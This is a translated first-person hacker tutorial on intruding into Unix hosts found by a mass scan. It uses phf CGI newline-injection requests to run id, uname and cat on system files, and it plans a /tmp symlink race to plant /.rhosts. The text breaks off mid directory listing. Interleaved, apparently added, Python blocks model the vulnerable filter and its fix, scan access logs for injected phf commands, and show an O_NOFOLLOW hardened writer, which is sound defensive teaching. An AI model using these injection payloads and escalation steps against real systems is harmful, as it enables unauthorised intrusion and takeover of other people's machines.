Quick UNIX skills

Source: Internet
Author: User

First, use a scanner to find your targets. Such tools are easy to find online. mscan is a well-known one; its usage is described in its own README, so I won't explain it here. It is in English, of course. mscan will turn up remote hosts with obvious, well-known vulnerabilities. I had results right away; in my experience at least 50% of the hits can be followed up.
Well, to get a foot in the door, start with the most famous one, the phf bug. Grep the scan log for it:

test# more co.xx.log | grep phf | more
xx.xx VULN: runs /cgi-bin/phf. haha!
....
....

Wow, so many! Let's take them one by one. The machines in this domain are really #@!#@.
Let's get going. First check which user httpd runs as. If it's root, it's boring: what is there left to do then, hand victim's shadow file over straight away? That would be too dull. Of course, I'm not a bad guy; hosts in China are just too weak, and hacking them is boring. // shy
test# lynx xx.xx/cgi-bin/phf?Qalias=x%0aid
Query Results

/usr/local/bin/ph -m alias=x id
uid=60001(nobody) gid=60001(nobody)

(The %0a is a URL-encoded newline. phf escaped the usual shell metacharacters before handing the query to popen(), but it forgot newline, so everything after the %0a runs as a second command in the shell phf spawns, as whatever user httpd runs as.)

Hmm, it's nobody. That makes it harder, but never mind; the harder the machine, the more interesting it is. And anyway, don't we already have a shell of sorts? Come on! Let's see what OS victim is running.
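To make the mechanism concrete, here is an added example written for this page (it is not code from the original article or from NCSA httpd). It models phf's escape function in Python and feeds the same kind of Qalias query through /bin/sh, once with the original escape list and once with a filter that rejects CR/LF. The escape list is the one NCSA's escape_shell_cmd() used; the path /usr/local/bin/ph, and using `echo injected` in place of `id`, are assumptions for the demonstration, which assumes ph is not installed on the machine running it.

```python
import subprocess
from urllib.parse import unquote

# Path phf passed to popen(); assumed not to exist on the machine running this demo.
PH = "/usr/local/bin/ph"

# Shell metacharacters that NCSA's escape_shell_cmd() prefixed with a backslash.
# Note what is missing: newline (0x0a) and carriage return (0x0d).
NCSA_META = "&;`'\"|*?~<>^()[]{}$\\"


def escape_shell_cmd_vuln(s: str) -> str:
    """Reproduction of the original filter: every listed metacharacter is escaped,
    but a newline passes through untouched and ends the command line for sh."""
    return "".join("\\" + ch if ch in NCSA_META else ch for ch in s)


def escape_shell_cmd_fixed(s: str) -> str:
    """Hardened variant: refuse CR/LF outright instead of trying to escape them.
    (Escaping them would also work; rejecting is simpler to reason about.)"""
    if "\n" in s or "\r" in s:
        raise ValueError("CR/LF in CGI parameter")
    return escape_shell_cmd_vuln(s)


def build_ph_command(qalias_raw: str, escaper) -> str:
    """What phf did: URL-decode the Qalias parameter, escape it, and splice it
    into a command string destined for popen() (which runs /bin/sh -c)."""
    return f"{PH} -m alias={escaper(unquote(qalias_raw))}"


def run_through_sh(cmdline: str) -> str:
    """Execute the command string the way popen() would and return its stdout."""
    result = subprocess.run(["sh", "-c", cmdline], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    # Semicolon injection: blocked by the escape list (sh sees a literal ';').
    print(repr(run_through_sh(build_ph_command("x%3Becho%20injected", escape_shell_cmd_vuln))))
    # Newline injection: the second line runs as its own command, as in the article.
    print(repr(run_through_sh(build_ph_command("x%0aecho%20injected", escape_shell_cmd_vuln))))
    # The same request against the hardened filter is rejected before any shell is involved.
    try:
        build_ph_command("x%0aecho%20injected", escape_shell_cmd_fixed)
    except ValueError as e:
        print("rejected:", e)
```

The real fix is not a better blacklist at all: pass the alias to ph as a separate argv element (execv rather than a shell command string) and a newline becomes nothing more than a byte inside one argument.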
test# lynx xx.xx/cgi-bin/phf?Qalias=x%0auname%20-a
Query Results

/usr/local/bin/ph -m alias=x uname -a
SunOS host1 5.5 Generic sun4m sparc SUNW,SPARCstation-4

Hmm, it's Sun Solaris 2.5. Sun has plenty of bugs, but we haven't got a shell yet. Next, let's see what services this machine runs.
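From the other side of the fence: every one of these requests leaves a line in the web server's access log, and the tell-tale is a CR or LF (%0a / %0d) inside a /cgi-bin/phf query. The following is an added example, not part of the original article, that pulls the injected command lines out of Common Log Format lines. The log lines, IP addresses and timestamps are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Common Log Format lines for the demonstration (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Apr/1997:10:01:02 +0800] "GET /index.html HTTP/1.0" 200 1043
10.0.0.9 - - [24/Apr/1997:10:02:17 +0800] "GET /cgi-bin/phf?Qalias=x%0aid HTTP/1.0" 200 512
10.0.0.9 - - [24/Apr/1997:10:02:40 +0800] "GET /cgi-bin/phf?Qalias=x%0acat%20/etc/inet/inetd.conf HTTP/1.0" 200 7712
10.0.0.7 - - [24/Apr/1997:10:03:05 +0800] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 300
10.0.0.9 - - [24/Apr/1997:10:04:11 +0800] "GET /cgi-bin/phf?Qalias=x%0d%0auname+-a HTTP/1.0" 404 210
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)


def injected_commands(url: str) -> list:
    """Return the extra shell command lines smuggled into a phf request.

    phf URL-decoded each query parameter and spliced it into a command string for
    popen(); anything after a CR/LF in the decoded value is a separate command line
    for /bin/sh, so that is exactly what is extracted here."""
    parts = urlsplit(url)
    if not parts.path.endswith("/phf"):
        return []
    found = []
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl percent-decodes and turns '+' into a space, as phf did
        lines = re.split(r"[\r\n]+", value)
        found.extend(line.strip() for line in lines[1:] if line.strip())
    return found


def scan_log(text: str) -> list:
    """Return (client ip, status, [commands]) for each phf request carrying a CR/LF."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        cmds = injected_commands(m.group("url"))
        if cmds:
            hits.append((m.group("ip"), m.group("status"), cmds))
    return hits


if __name__ == "__main__":
    for ip, status, cmds in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} injected={cmds}")
```

A plain `grep phf` would also flag the legitimate lookup for `smith`; splitting on the decoded newline is what separates probing from normal use, and the status code tells you whether the server actually answered.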
test# lynx xx.xx/cgi-bin/phf?Qalias=x%0acat%20/etc/inet/inetd.conf
There's a lot of output; I'll pick out a few useful lines.

#OLD# telnet stream tcp nowait root /usr/sbin/in.telnetd     in.telnetd
#OLD# ftp    stream tcp nowait root /usr/local/etc/ftpd      in.ftpd
#TIS# ftp    stream tcp nowait root /usr/local/etc/netacl    in.ftpd
#TIS# telnet stream tcp nowait root /usr/local/etc/netacl    in.telnetd
ftp    stream tcp nowait root /usr/sbin/in.ftpd     in.ftpd
telnet stream tcp nowait root /usr/sbin/in.telnetd  in.telnetd

shell  stream tcp nowait root /usr/sbin/in.rshd     in.rshd
login  stream tcp nowait root /usr/sbin/in.rlogind  in.rlogind
exec   stream tcp nowait root /usr/sbin/in.rexecd   in.rexecd

Hmm, it looks unguarded: the commented-out #TIS# lines show the TIS Firewall Toolkit's netacl wrapper was configured at one point, but the live entries run in.ftpd and in.telnetd directly, and the r-services are all switched on. Still, it shouldn't be that simple. Let's look at its hosts file.
test# lynx xx.xx/cgi-bin/phf?Qalias=x%0acat%20/etc/inet/hosts
127.0.0.1   localhost
xx.xx       host1 loghost
xx.x        host1-gw-firewall

Well, there is a firewall, which is a headache. Let's see which services get through it.
test# telnet xxxx.xx
Trying xx.xx...
test# rlogin -l root xxx.xx.xx.x
test# ftp xxx.xx
test# rpcinfo -p xx.xx
No response

Hmm. It seems no services are allowed in from outside at all! We'll have to keep working through phf. That doesn't make it hopeless: an administrator who trusts the firewall too much easily gets sloppy inside it. We could use phf to build a proper exploit, but that's quite troublesome. Let's look for a symlink opportunity first.

test# lynx xx.xx/cgi-bin/phf?Qalias=x%0als%20-la%20/tmp
Query Results

/usr/local/bin/ph -m alias=x ls -la /tmp
total 26
drwxrwxrwt   2 sys         109 Apr 24 .
drwxr-xr-x  25 root       1024 Apr 24 ..
-rw-r--r--   1 root sys   4856 Mar 25 ps_data
-rw-------   1 root          0 Apr 24 license_log

Hey, there's a door. license_log is owned by root; it seems this administrator has not paid attention to the license server's /tmp race problem: a privileged daemon that writes a fixed file name in a world-writable directory will follow a symlink planted there, and so writes as root wherever the link points. OK, let's see whether a /.rhosts has already been put in place to guard against this trick. (Knowing to look in /tmp or /var/tmp here comes from experience, not blind guessing. What about /etc/passwd? I'm not interested in it; I couldn't use it anyway, so reading it is pointless. For now phf already gives us an account.)
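The race the article is betting on, as an added example written for this page (not code from the article or from any license server): a privileged process that opens a fixed name in a world-writable directory with a plain open() follows whatever symlink has been planted there, whereas O_NOFOLLOW makes the kernel refuse the link at open time, so there is no lstat-then-open window left to race. The directory layout, the file name dot_rhosts standing in for /.rhosts and the `+ +` payload are assumptions for the demonstration, which runs as the invoking user rather than root.

```python
import os
import shutil
import stat
import tempfile


def vulnerable_append(path: str, data: str) -> None:
    """What a careless daemon does: open() follows symlinks, so if `path` is a link
    planted by an attacker the write lands wherever the link points."""
    with open(path, "a") as f:
        f.write(data)


def hardened_append(path: str, data: str) -> None:
    """Open without following symlinks and verify what we actually got before writing.
    O_NOFOLLOW fails with ELOOP on a symlink; the fstat() checks catch a pre-planted
    regular file owned by someone else, or a hard link to a file we must not touch."""
    fd = os.open(path, os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW, 0o600)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path}: not a regular file")
        if st.st_uid != os.geteuid():
            raise PermissionError(f"{path}: owned by uid {st.st_uid}, refusing to write")
        if st.st_nlink != 1:
            raise PermissionError(f"{path}: has {st.st_nlink} links, refusing to write")
        os.write(fd, data.encode())
    finally:
        os.close(fd)


def demo() -> dict:
    """Plant a symlink named license_log that points at a stand-in for /.rhosts,
    then try both writers against it. Returns what happened for inspection."""
    workdir = tempfile.mkdtemp(prefix="tmprace-")   # constructed stand-in for /tmp
    try:
        target = os.path.join(workdir, "dot_rhosts")  # stand-in for /.rhosts
        open(target, "w").close()
        link = os.path.join(workdir, "license_log")   # attacker's pre-planted link
        os.symlink(target, link)

        vulnerable_append(link, "+ +\n")              # the write goes through the link
        with open(target) as f:
            target_contents = f.read()

        hardened_refused = False
        try:
            hardened_append(link, "+ +\n")
        except OSError:                               # ELOOP raised by O_NOFOLLOW
            hardened_refused = True

        # With nothing planted, the hardened writer behaves like a normal append.
        clean = os.path.join(workdir, "license_log.clean")
        hardened_append(clean, "ok\n")
        hardened_append(clean, "ok\n")
        with open(clean) as f:
            clean_contents = f.read()
    finally:
        shutil.rmtree(workdir)

    return {
        "target_contents": target_contents,
        "hardened_refused": hardened_refused,
        "clean_contents": clean_contents,
    }


if __name__ == "__main__":
    print(demo())
```

Even with O_NOFOLLOW, a root daemon has no business keeping state under a fixed name in /tmp; a directory it owns with mode 0700, or a per-run name from mkstemp(), removes the attacker's ability to pre-create anything at all.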

test# lynx xx.xx/cgi-bin/phf?Qalias=x%0als%20-la%20/
Query Results

/usr/local/bin/ph -m alias=x ls -la /
total 621
drwxr-xr-x  25 root       1024 Apr 24 .
drwxr-xr-x  25 root       1024 Apr 24 ..
-rw-r--   1 root
